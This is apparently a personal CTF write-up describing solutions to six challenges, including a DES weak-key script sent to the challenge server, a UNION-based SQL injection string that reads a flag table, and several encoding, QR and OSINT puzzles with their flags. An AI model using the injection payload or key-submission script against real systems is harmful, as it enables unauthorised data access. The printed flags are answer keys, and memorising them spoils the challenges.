8 Hour CTF, placed 68th/1100 Registered Team Accounts.
Odysseus - 500 Points
I already encrypted the flag once but two times can never hurt right? I’ll let you send me another key to encrypt it with! (in hex)
Based on the description, this challenge requires a DES Weak Key Attack. Weak keys are keys that cause the encryption to act identically to the decryption mode.
I used the list of keys found on this github repo. Simple pwntools script to get the flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
#nc challenge.ctf.games 32350
with open('keys') as my_file:
keys_array = my_file.readlines()
for key in keys_array:
conn = remote('challenge.ctf.games', 32350)
conn.recvline()
conn.send(key)
try:
hex_string = str(conn.recvline(), 'utf-8')[1:-1]
bytes_object = bytes.fromhex(hex_string)
ascii_string = bytes_object.decode("ASCII")
print(ascii_string)
if flag in ascii_string:
exit(1)
except:
pass
conn.close()
flag{9b9169ac15fe51e8f337bc2786e4fb36}
Syringe (338 Points)
Doctors love their databases! Here is a library of words and semantics relating to medical words, like “syringe”, or “x-ray”, or “injection”. Find whatever you need, just by searching for it!
Simple SQL Injection challenge. We are given the query:
1
SELECT * FROM semantics WHERE name LIKE "%<userinput>%"
We can do a simple injection:
1
garbage%" or name = "doctor" or name LIKE "%garbage%" UNION SELECT * FROM flag WHERE flag LIKE "%
and get the flag.
flag{f2a5006b1b07cc08362772807322ef62}
Hyperopia (272 Points)
erything close up is blurry… can you please help me read this?
You are given a blurry QR code. Using Gimp’s Sharp Unmask tool with Radius 3 Amount 20 Threshhold 0, I was able to make the qrcode scannable.
flag{3efd4bd34663e618c70e051505c83f9f}
Triple (50 Points)
I was studying something called ASCII armor because I wanted to become better at encoding. I was having fun until I realized I couldn’t decode my message…
I simply noticed the string encoded in base64 and decoded the string three times.
1
2
kali@kali:~/Desktop/ctf/grimcon0x3/desshit$ echo V20xNGFGb3pjM3BQVkd0M1RsZFJlVTFVVVRSYWFsSnRXa2RKTTFscVFYbE9WMDE1VFRKUk1rOUVVWGROUkU1cVdXNHdQUT09 | base64 -d | base64 -d | base64 -d
flag{39905d2148f4fdb7b025c23d684003cb}
flag{39905d2148f4fdb7b025c23d684003cb}
ZipZip (50 Points)
My friend sent me this zip file… He is a prankster and compressed the file a LOT of times… I don’t know how to make this go quickly and I don’t have the time… At least he told me the password is “pass”. Can you please help?
There is a file zipped 50 times, each time with the word pass. I can use a bash script to unzip everything.
1
2
3
4
5
6
7
#!/bin/bash
for i in $(seq -f "%02g" 50 -1 0)
do
unzip -P pass $i.zip
#i=$((i-1))
done
cat flag.txt
flag{cf97382071cb149aac8d6ab8baeaa3ee}
wannabeel33t
OSINT Challenge. We can given the username wannabeel33t. Googling shows a reddit profile. The bio has something URL Encoded. Throwing it into cyberchef, we get the flag.
flag{66b15347c58c91d1937f0b40e973d3f6}
Conclusion
I wish the CTF was longer than 8 hours (and I wish that I had actual teammates as well). The challenges were good and creative, I just did not have the time to solve a lot of things.